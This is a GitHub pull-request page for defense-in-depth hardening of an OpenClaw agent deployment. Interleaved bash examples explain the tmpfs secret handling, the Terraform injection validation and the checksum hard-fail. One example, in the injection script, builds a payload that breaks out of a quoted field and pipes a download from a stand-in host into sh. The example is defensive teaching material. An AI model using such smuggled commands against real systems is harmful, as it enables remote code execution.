
Comprehensive Security Hardening — Defense-in-Depth Implementation #1

Merged
feliperun merged 1 commit into main from security-hardening on Feb 10, 2026

Conversation

@feliperun
Owner

Summary

Implements comprehensive defense-in-depth security hardening across all layers of the infrastructure, informed by the Bitdefender Technical Advisory on OpenClaw Exploitation in Enterprise Networks (Feb 2026).

This PR positions create-openclaw-agent as a reference implementation for secure OpenClaw IaC deployment.

Changes by Category

Critical Fixes

  • Secrets on persistent disk — Fixed .env being written to persistent disk instead of tmpfs. Now writes entire .env to tmpfs and creates a symlink. Secrets are never captured in shell variables (writes directly from gcloud to tmpfs files).
  • Installer checksum hard-fail — Failed checksum now aborts installation instead of silently continuing. Added macOS shasum fallback.
  • Terraform injection — Added validation blocks on all string variables to prevent shell injection via templatefile().

Container Hardening (docker-compose)

  • Bridge network — Migrated from network_mode: host to isolated bridge network (openclaw-net). Gateway ports bound to 127.0.0.1 only. Qdrant and Chrome accessible only within the bridge.
  • Read-only filesystem — read_only: true on all containers with explicit tmpfs mounts for writable paths (/tmp, /home/node/.cache, /dev/shm).
  • Capability dropping — cap_drop: [ALL] on all containers. Chrome gets only SYS_ADMIN (required for headless operation).
  • Image pinning — All Docker images pinned by version + SHA256 digest (Qdrant v1.13.2, Chrome 145.0.7632.46).

Infrastructure Hardening (Terraform)

  • Egress firewall — Three new rules: allow HTTPS (443/80), allow DNS (53), deny-all (priority 65534). Blocks reverse shells on non-standard ports.
  • OS Login — enable-oslogin = TRUE ties SSH access to IAM identity.
  • Automatic security updates — unattended-upgrades installed on VM (no auto-reboot).
  • Data Access audit logging — Enabled on backup bucket via google_project_iam_audit_config.
  • Narrowed OAuth scopes — Replaced cloud-platform with specific API scopes.

Backup Security

  • Client-side encryption — Backups encrypted with age before upload to GCS. Private key stored in Secret Manager.
  • Backward compatibility — Restore handles both encrypted (.age) and unencrypted (.tar.gz) backups.
  • Cleanup traps — Sensitive temp files cleaned up on any exit via trap.

CI/CD Hardening

  • gitleaks — Replaced grep-based secret detection with gitleaks/gitleaks-action.
  • SHA-pinned Actions — All GitHub Actions pinned by commit SHA.
  • Permissions — Workflow restricted to permissions: contents: read.
  • Trivy — Container image vulnerability scanning for Qdrant and Chrome.

Supply Chain

  • Pre-commit hooks — .pre-commit-config.yaml with gitleaks, shellcheck, terraform-fmt/validate.
  • Docker image digests — All images pinned by tag@sha256:digest.
  • .gitleaks.toml — Project-specific allowlist for documentation files.

Documentation

  • docs/security.md — Comprehensive security architecture document with threat model, 7 defense layers, attack vector mapping, and verification commands.
  • README.md — Updated with security section and architecture details.
  • AGENTS.md / CLAUDE.md — Updated project structure and conventions.

Attack Vector Mapping (Bitdefender Advisory)

Attack Vector | Mitigation
ClawHavoc (base64 payload, C2 callback) | Egress firewall blocks non-standard ports; cap_drop: ALL; bridge network
AuthTool (reverse shell via curl) | Egress restricted to 80/443/53; read_only filesystem; no-new-privileges
Hidden Backdoor (install-time exploitation) | Checksum hard-fail; SHA-pinned Actions; Secure Boot; input validation
Credential Exfiltration (.env theft) | .env symlink to tmpfs; secrets never on persistent disk; restrictive umask

Code Review

Three sequential review rounds were performed:

  1. Security — Found and fixed 6 issues (1 CRITICAL shell injection, 3 HIGH)
  2. Correctness — Found and fixed 8 issues (1 CRITICAL OAuth scope, 6 HIGH including Chrome healthcheck)
  3. Best practices — Cleanup, DRY improvements, shellcheck compliance

E2E Testing

  • Full infrastructure provisioned on real GCP (project, VM, bucket, secrets, firewall rules)
  • 12/12 security assertions verified (no external IP, Secure Boot, IAP firewall, egress rules, OS Login, etc.)
  • All resources destroyed after testing

Usability Impact

Zero impact on agent functionality. All agent operations (crons, configs, plugins, memory, workspace) continue working because they use mounted volumes which are exempt from read_only. Bridge network changes are transparent via automatic service name configuration.

Test Plan

  • tofu validate passes
  • tofu fmt -check passes
  • E2E infrastructure provisioning and security verification
  • ShellCheck compliance on all shell scripts
  • YAML lint on templates
  • Three rounds of code review (security, correctness, best practices)
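The first critical fix in the PR description (the .env written to tmpfs behind a symlink, values streamed from the secret store without ever landing in a shell variable, plus a restrictive umask and cleanup on failure) is easier to reason about with a concrete script. The following is an added example and not code from the create-openclaw-agent repository; it assumes that RAMDIR is an already mounted tmpfs and uses a local `fetch_secret` function as a stand-in for `gcloud secrets versions access latest --secret=NAME`, with constructed secret values:

```bash
#!/usr/bin/env bash
# Added example, not code from the create-openclaw-agent repository: stage the
# agent's .env on a RAM-backed filesystem and expose it to the compose stack
# through a symlink, so secret values never touch persistent disk and never pass
# through a shell variable on the way. Assumptions not taken from the PR:
# RAMDIR is an already mounted tmpfs (e.g. /dev/shm or a mount the installer
# creates), and fetch_secret stands in for
# `gcloud secrets versions access latest --secret=NAME`.
set -eu

# Stand-in for gcloud: prints a constructed secret value to stdout, nothing else.
fetch_secret() {
  case "$1" in
    openclaw-api-key) printf 'sk-constructed-example-value' ;;
    qdrant-api-key)   printf 'qd-constructed-example-value' ;;
    *) echo "fetch_secret: unknown secret '$1'" >&2; return 1 ;;
  esac
}

# is_tmpfs DIR -> 0 if DIR is on tmpfs (Linux: GNU stat -f reports the fs type).
is_tmpfs() {
  [ "$(stat -f -c %T "$1" 2>/dev/null)" = "tmpfs" ]
}

# write_env RAMDIR LINK VAR:secret-name [VAR:secret-name ...]
# Builds RAMDIR/.env (mode 0600) by streaming each secret straight from
# fetch_secret into the file, renames it into place atomically, then points
# LINK (the path docker-compose reads) at it. There is no $(...) capture, so
# the values never appear in the environment, in `set -x` traces, or in
# /proc/PID/environ of the installer.
write_env() {
  local ramdir="$1" link="$2" envfile="$1/.env" tmp old_umask pair
  shift 2
  old_umask=$(umask)
  umask 077                                   # every file created below is 0600
  tmp=$(mktemp "$ramdir/.env.XXXXXX")
  for pair in "$@"; do
    # NAME=, then the value directly from the fetch command, then a newline.
    if ! { printf '%s=' "${pair%%:*}" && fetch_secret "${pair#*:}" && printf '\n'; } >> "$tmp"; then
      rm -f "$tmp"                            # never leave a half-written secrets file behind
      umask "$old_umask"
      echo "write_env: could not fetch '${pair#*:}'; partial file removed" >&2
      return 1
    fi
  done
  mv -f "$tmp" "$envfile"
  ln -sfn "$envfile" "$link"
  umask "$old_umask"
}

# Demo with a throwaway directory; in production RAMDIR must be a real tmpfs.
work=$(mktemp -d)
mkdir "$work/ram" "$work/agent"
write_env "$work/ram" "$work/agent/.env" OPENCLAW_API_KEY:openclaw-api-key QDRANT_API_KEY:qdrant-api-key
if is_tmpfs "$work/ram"; then
  echo "demo: .env staged on tmpfs"
else
  echo "demo: $work/ram is NOT tmpfs (fine for a demo, wrong for production)"
fi
ls -l "$work/agent/.env" "$work/ram/.env"
rm -rf "$work"
```

The check a practitioner wants before trusting this in production is `is_tmpfs` on the staging directory: a symlink into a directory that is not RAM-backed gives the appearance of the fix without the property, and the restore of a VM snapshot would then carry the secrets along.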

Implements defense-in-depth security measures informed by the Bitdefender
Technical Advisory on OpenClaw exploitation (Feb 2026). This positions the
project as a reference implementation for secure OpenClaw IaC.

Critical fixes:
- Fix secrets leaking to persistent disk (tmpfs symlink, no shell vars)
- Fix installer checksum verification hard-fail (with macOS support)
- Fix Terraform variable injection via validation blocks

Container hardening:
- Migrate from host network to isolated bridge network
- Read-only root filesystem with explicit tmpfs mounts
- Drop all Linux capabilities (cap_drop: ALL)
- Pin Docker images by version + SHA256 digest
- Chrome gets only SYS_ADMIN capability

Infrastructure hardening:
- Egress firewall restricts outbound to ports 80/443/53 only
- OS Login for IAM-authenticated SSH access
- Automatic security updates (unattended-upgrades)
- Data Access audit logging on backup bucket
- Narrowed OAuth scopes

Backup security:
- Client-side encryption with age before GCS upload
- Backward-compatible restore (handles both encrypted and unencrypted)
- Cleanup traps for sensitive temp files

CI/CD hardening:
- Replace grep with gitleaks for secret detection
- SHA-pin all GitHub Actions
- Restrict workflow permissions to contents:read
- Add Trivy container image vulnerability scanning

Supply chain:
- Pre-commit hooks (gitleaks + shellcheck + terraform-fmt)
- All Docker images pinned by digest

Documentation:
- New docs/security.md with full threat model and defense mapping
- Updated README, AGENTS.md with security architecture
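The Terraform injection fix ("validation blocks on all string variables to prevent shell injection via templatefile()") in the PR description and the commit message above is worth seeing end to end, because templatefile() performs plain textual substitution into the VM startup script. The script below is an added example, not the project's Terraform or scripts: it mimics that substitution in shell, shows a constructed hostile value being spliced into the script verbatim, and applies the shell equivalent of a validation block. The template line, the variable name `agent_name` and the regex are illustrative assumptions:

```bash
#!/usr/bin/env bash
# Added example, not the project's Terraform or scripts: why the PR puts
# validation blocks on every string variable that reaches templatefile().
# templatefile() substitutes a variable's value textually into the startup
# script, so a value carrying shell metacharacters becomes code when the VM
# runs that script. The functions below mimic that substitution and the shell
# equivalent of a validation block such as (illustrative, not the project's):
#   variable "agent_name" {
#     validation {
#       condition     = can(regex("^[a-z][a-z0-9-]{0,62}$", var.agent_name))
#       error_message = "agent_name must be a lowercase DNS-style label."
#     }
#   }
set -eu

# One line of a startup-script template with a templatefile()-style placeholder.
TEMPLATE='mkdir -p "/opt/openclaw/${agent_name}" && echo "agent ${agent_name} ready"'

# render_unvalidated TEMPLATE VALUE: plain textual substitution, no checks
# (the pre-fix behaviour). Both pattern and replacement are quoted so bash
# treats them literally.
render_unvalidated() {
  local pat='${agent_name}'
  printf '%s\n' "${1//"$pat"/"$2"}"
}

# validate_identifier VALUE: 0 iff VALUE matches ^[a-z][a-z0-9-]{0,62}$,
# the same condition the validation block would enforce at plan time.
validate_identifier() {
  printf '%s' "$1" | LC_ALL=C grep -Eq '^[a-z][a-z0-9-]{0,62}$'
}

# render_validated TEMPLATE VALUE: refuse to render anything that fails validation.
render_validated() {
  if ! validate_identifier "$2"; then
    echo "agent_name '$2' rejected: must match ^[a-z][a-z0-9-]{0,62}\$" >&2
    return 1
  fi
  render_unvalidated "$1" "$2"
}

# Constructed hostile value: closes the quoted string, runs a command, reopens it.
PAYLOAD='x"; curl http://example.invalid/p | sh; echo "'

echo "--- before (unvalidated): the payload is spliced into the script verbatim"
render_unvalidated "$TEMPLATE" "$PAYLOAD"
echo "--- after (validated):"
render_validated "$TEMPLATE" "$PAYLOAD" || echo "render refused (exit $?)"
render_validated "$TEMPLATE" agent-01
```

Quoting the placeholder in the template does not help: the hostile value simply closes the quote. Only an allowlist on the value itself, enforced before rendering, keeps shell syntax out of the startup script.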
feliperun merged commit 591f96d into main on Feb 10, 2026
feliperun deleted the security-hardening branch on February 10, 2026 at 23:15
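The installer checksum hard-fail with a macOS shasum fallback, listed under Critical Fixes in the PR description and in the commit message, is the kind of check that is easy to get subtly wrong (a warning that is printed but not acted on, a digest compared in the wrong case, a missing tool treated as success). The following is an added example and not the project's installer; it assumes the expected SHA-256 is obtained out of band, since the PR does not say where the project publishes it, and uses a constructed file as the "download":

```bash
#!/usr/bin/env bash
# Added example, not the project's installer: verify a downloaded installer
# against an expected SHA-256 and abort on any problem, using sha256sum where
# available and `shasum -a 256` on macOS. Assumption: the expected digest is
# obtained out of band (the PR does not say where it is published).
set -eu

# sha256_of FILE -> hex digest, whichever tool the platform provides.
# A missing tool is an error (exit 2), not a silent pass.
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | awk '{print $1}'
  elif command -v shasum >/dev/null 2>&1; then
    shasum -a 256 "$1" | awk '{print $1}'
  else
    echo "sha256_of: neither sha256sum nor shasum found; refusing to continue" >&2
    return 2
  fi
}

# verify_checksum FILE EXPECTED_HEX
#   0: match   1: digest mismatch   2: bad input or tooling problem
# The expected value is lower-cased so a copy-pasted upper-case digest matches.
verify_checksum() {
  local file="$1" expected actual
  expected=$(printf '%s' "$2" | tr 'A-F' 'a-f')
  case "$expected" in
    ''|*[!0-9a-f]*) echo "verify_checksum: expected digest must be hex" >&2; return 2 ;;
  esac
  if [ ${#expected} -ne 64 ]; then
    echo "verify_checksum: expected digest must be 64 hex chars, got ${#expected}" >&2
    return 2
  fi
  [ -f "$file" ] || { echo "verify_checksum: no such file '$file'" >&2; return 2; }
  actual=$(sha256_of "$file") || return 2
  if [ "$actual" != "$expected" ]; then
    printf 'verify_checksum: MISMATCH for %s\n  expected %s\n  actual   %s\n' \
      "$file" "$expected" "$actual" >&2
    return 1
  fi
  return 0
}

# install_from INSTALLER EXPECTED_HEX: the hard-fail wrapper. Any non-zero
# status from verify_checksum (mismatch, malformed digest, missing tool) aborts;
# nothing is executed unless the digest matched.
install_from() {
  local installer="$1" expected="$2"
  if ! verify_checksum "$installer" "$expected"; then
    echo "install aborted: refusing to run an unverified installer" >&2
    return 1
  fi
  echo "checksum ok, running $installer"
  # sh "$installer"   # the real installer would be executed here
}

# Demo on a constructed file whose SHA-256 is known.
demo=$(mktemp)
printf 'hello\n' > "$demo"
install_from "$demo" 5891b5b522d5df086d0ff0b110fbd9d21bb4fc7163af34d08286a2e846f6be03
install_from "$demo" 0000000000000000000000000000000000000000000000000000000000000000 \
  || echo "demo: tampered download rejected (exit $?)"
rm -f "$demo"
```

The distinction between exit 1 and exit 2 matters for CI: a mismatch is a supply-chain signal worth alerting on, while a missing hashing tool is an environment problem, and both must stop the install rather than fall through to running the file.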